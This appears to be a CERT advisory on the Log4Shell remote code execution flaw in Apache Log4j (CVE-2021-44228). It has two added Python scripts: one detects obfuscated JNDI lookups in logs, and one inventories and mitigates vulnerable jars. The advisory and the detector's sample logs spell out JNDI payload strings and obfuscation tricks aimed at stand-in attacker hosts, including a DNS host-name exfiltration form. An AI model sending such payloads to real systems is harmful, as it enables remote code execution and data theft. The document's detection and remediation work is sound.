
Log4Shell: Apache Log4j Remote Code Execution (CVE-2021-44228)

Advisory No: TZCERT/SA/2021/12/14

Date of First Release: 14th December 2021

Source: Apache

Software Affected: All versions of Log4j from 2.0-beta9 to 2.14.1

Overview

Apache Log4j 2 versions 2.0-beta9 through 2.14.1 are vulnerable to unauthenticated remote code execution. A remote attacker who can get attacker-controlled text written to a log (for example through an HTTP header, a username or a URL parameter) can run arbitrary code on the affected machine.

Description

Log4j is an open-source logging library used by a very large share of Java software; Java itself runs on an estimated 3 billion devices, including web servers, mobile devices, and even smart devices such as fridges. Every Log4j 2 release in the range above is vulnerable to arbitrary code execution.

The vulnerability lies in Log4j's JNDI lookup feature. When a logged message contains a ${jndi:...} lookup, Log4j resolves the name through the Java Naming and Directory Interface (JNDI), most commonly over the Lightweight Directory Access Protocol (LDAP) but also over RMI or DNS. Because JNDI will follow a reference to a remote Java class, the lookup lets an attacker make the application retrieve a payload from a server they control and execute it locally.

To exploit the vulnerability, an attacker sends the application a request containing a malicious payload in any field that ends up being logged. The crafted payload looks like the following:

${jndi:ldap://attacker_controlled_website/payload_to_be_executed}

When the attacker's string is logged, vulnerable Log4j interprets it as a JNDI lookup and connects to the attacker's server to resolve the name. The server replies with a reference pointing at a remote Java class, which the vulnerable application downloads, loads and runs. No authentication to the application is needed; the attacker only has to reach a code path that logs their input.
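Detection logic for the payload described above, as an added example that is not part of the advisory or of Apache's code. Attackers quickly began hiding the "jndi" keyword behind nested lookups such as ${lower:j}, ${upper:n}, ${::-j} and ${env:NOPE:-j}, which Log4j resolves before the JNDI lookup runs; a detector that only greps for the literal ${jndi: misses them. The script peels those layers from the inside out the way Log4j's substitutor does and then reports the scheme and target of any JNDI lookup. The log lines and the attacker.example hosts are constructed samples.

```python
"""Spot Log4Shell lookup strings in request logs, including the obfuscated
forms seen in the wild. Added example, not code from the advisory or from
Apache; the log lines and attacker.example hosts below are constructed."""
import re

# Innermost ${...} lookup (no nested lookup inside it); Log4j resolves these first.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we want to see once the obfuscation has been peeled away.
JNDI = re.compile(r"\$\{jndi:([^}]*)\}", re.IGNORECASE)


def _evaluate(body):
    """Evaluate one innermost lookup body the way Log4j's StrSubstitutor does
    for the idioms attackers use to hide the word 'jndi'. Returns None to leave
    the text untouched, which is how the ${jndi:...} lookup itself survives."""
    key, has_default, default = body.partition(":-")   # ${key:-default}
    prefix, _, arg = key.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":                                # ${lower:J} -> j
        return arg.lower()
    if prefix == "upper":                                # ${upper:n} -> N
        return arg.upper()
    if prefix == "date" and len(arg) >= 2 and arg[0] == arg[-1] == "'":
        return arg[1:-1]                                 # ${date:'j'} -> j (quoted literal)
    if prefix == "jndi":
        return None                                      # keep it for detection
    if has_default:
        return default                  # ${::-j}, ${env:NOPE:-j}, ${sys:nope:-j} -> j
    if not prefix:
        return None
    # Any other lookup (env, sys, hostName, ...) resolves to a value we cannot
    # know offline; a placeholder keeps the surrounding lookup detectable,
    # e.g. ${jndi:ldap://${hostName}.attacker.example/x}.
    return "<" + prefix + ">"


def normalize(text, max_rounds=32):
    """Peel nested lookups from the inside out until nothing more resolves."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            value = _evaluate(m.group(1))
            if value is None:
                return m.group(0)
            changed = True
            return value

        text = LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def find_jndi(text):
    """Return [(scheme, uri), ...] for every JNDI lookup in the de-obfuscated text."""
    hits = []
    for m in JNDI.finditer(normalize(text)):
        uri = m.group(1).strip()
        scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
        hits.append((scheme, uri))
    return hits


def scan(lines):
    """Scan log lines; returns [(line_number, scheme, uri), ...]."""
    return [(n, scheme, uri)
            for n, line in enumerate(lines, 1)
            for scheme, uri in find_jndi(line)]


# Constructed sample access-log lines (the User-Agent is the last quoted field).
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Dec/2021:09:12:01 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [14/Dec/2021:09:12:07 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.9 - - [14/Dec/2021:09:12:09 +0000] "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://attacker.example:1389/b}"',
    '10.0.0.9 - - [14/Dec/2021:09:12:11 +0000] "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:${date:\'r\'}mi://attacker.example:1099/c}"',
    '10.0.0.9 - - [14/Dec/2021:09:12:13 +0000] "GET / HTTP/1.1" 200 "${jndi:dns://${hostName}.attacker.example/d}"',
    '10.0.0.5 - - [14/Dec/2021:09:12:20 +0000] "GET /search?q=${price} HTTP/1.1" 200 "curl/7.79"',
]

if __name__ == "__main__":
    for line_no, scheme, uri in scan(SAMPLE_LOG):
        print(f"line {line_no}: jndi lookup over {scheme or '?'} -> {uri}")
```

Run it over an exported access log one line at a time; lines 2 to 5 of the sample are flagged (LDAP twice, RMI, DNS) and the benign ${price} on line 6 is not. The ${hostName} case matters in practice because attackers used it to exfiltrate host names and environment variables through DNS even where the class-loading step was blocked.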

The vulnerability has been assigned CVE-2021-44228 and carries the maximum CVSS v3.1 base score of 10.0.

Impact

Successful exploitation of this vulnerability may allow an attacker to take full control of the affected systems, with the privileges of the vulnerable Java process.

Solution:

Apache has released fixed versions of Log4j 2 (2.15.0 and later; see reference 1 for the release currently recommended for each Java baseline). Users and administrators are encouraged to upgrade to a fixed version as soon as possible. Where an immediate upgrade is not possible, Apache's documented stop-gap is to remove the JndiLookup class from the log4j-core jar on the classpath (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class) and restart the application. Disabling message lookups with log4j2.formatMsgNoLookups=true (2.10 and later) was also published as a mitigation, but Apache has since found it incomplete, so it should not be relied on alone.
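An inventory-and-mitigation script for the solution above, added here as an example; it is not code from the advisory or from Apache. It finds log4j-core jars under a directory, reads the version Maven bundles into each jar, flags anything in the advisory's affected range (treating the 2.12.2+ and 2.3.1+ backport lines as fixed), checks whether JndiLookup.class is present, and rewrites an affected jar without that class, which is what Apache's zip -d stop-gap does. The jars it builds for its own demonstration are constructed stand-ins with the real metadata layout and fake class bytes.

```python
"""Inventory log4j-core jars, flag versions in the advisory's affected range,
and apply Apache's class-removal mitigation. Added example, not code from the
advisory or from Apache; the sample jars it builds are constructed stand-ins."""
import os
import re
import tempfile
import zipfile

POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?$", re.I)
_STAGE_RANK = {"alpha": 0, "beta": 1, "rc": 2, None: 3}   # final release ranks highest


def parse_version(text):
    """Turn '2.0-beta9' or '2.14.1' into a sortable tuple."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    major, minor, patch, stage, num = m.groups()
    stage = stage.lower() if stage else None
    return (int(major), int(minor), int(patch or 0), _STAGE_RANK[stage], int(num or 0))


def is_affected(version):
    """Advisory range 2.0-beta9..2.14.1, minus the fixed backport lines for
    older Java baselines (2.12.2+ for Java 7, 2.3.1+ for Java 6)."""
    v = parse_version(version)
    if not parse_version("2.0-beta9") <= v <= parse_version("2.14.1"):
        return False
    if parse_version("2.12.2") <= v < parse_version("2.13.0"):
        return False
    if parse_version("2.3.1") <= v < parse_version("2.4.0"):
        return False
    return True


def inspect_jar(path):
    """Read the bundled Maven version and check for the JndiLookup class."""
    with zipfile.ZipFile(path) as z:
        names = set(z.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in z.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version is None:   # fall back to the file name, e.g. log4j-core-2.14.1.jar
            m = re.search(r"log4j-core-([0-9][^/]*?)\.jar$", os.path.basename(path))
            version = m.group(1) if m else None
        jndi_present = JNDI_CLASS in names
    try:
        affected = version is not None and jndi_present and is_affected(version)
    except ValueError:
        affected = None   # unknown version scheme: review by hand
    return {"path": path, "version": version, "jndi_present": jndi_present, "affected": affected}


def scan_tree(root):
    """Walk a directory tree and inspect every log4j-core jar found."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.startswith("log4j-core") and name.endswith(".jar"):
                results.append(inspect_jar(os.path.join(dirpath, name)))
    return results


def strip_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class; same effect as Apache's
    'zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class'."""
    tmp = path + ".tmp"
    with zipfile.ZipFile(path) as zin, zipfile.ZipFile(tmp, "w") as zout:
        for item in zin.infolist():
            if item.filename != JNDI_CLASS:
                zout.writestr(item, zin.read(item.filename))
    os.replace(tmp, path)


def make_sample_jar(path, version, with_jndi=True):
    """Constructed stand-in for a real log4j-core jar: real metadata layout, fake class bytes."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        z.writestr(POM_PROPERTIES,
                   f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if with_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # placeholder, not a real class file


def demo():
    """Build three sample jars, scan, mitigate the affected one, rescan."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    for ver in ("2.14.1", "2.12.2", "2.17.1"):
        make_sample_jar(os.path.join(root, f"log4j-core-{ver}.jar"), ver)
    before = {os.path.basename(r["path"]): r["affected"] for r in scan_tree(root)}
    for r in scan_tree(root):
        if r["affected"]:
            strip_jndi_lookup(r["path"])
    after = {os.path.basename(r["path"]): (r["jndi_present"], r["affected"]) for r in scan_tree(root)}
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after: ", after)
```

Point scan_tree at an application's install or deployment root. The class check is deliberately reported separately from the version check: releases from 2.15.0 onwards still ship JndiLookup.class, so its presence alone does not mean a jar is vulnerable, and its absence from a 2.14.1 jar only means the stop-gap was applied, not that the upgrade was. Log4j bundled inside WARs, EARs or shaded "fat" jars sits in nested archives that this simple walk does not open; extend inspect_jar to recurse into those in a real inventory.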

References:

  1. https://logging.apache.org/log4j/2.x/security.html
  2. https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
  3. https://www.kaspersky.com/blog/log4shell-critical-vulnerability-in-apache-log4j/43124/
  4. https://www.mcafee.com/blogs/cyberthreat-news/concerned-by-the-security-risk-affecting-popular-services-and-apps-heres-what-we-know/
  5. https://blog.shiftleft.io/log4shell-apache-log4j-remote-code-execution-4f58ed7e74f9
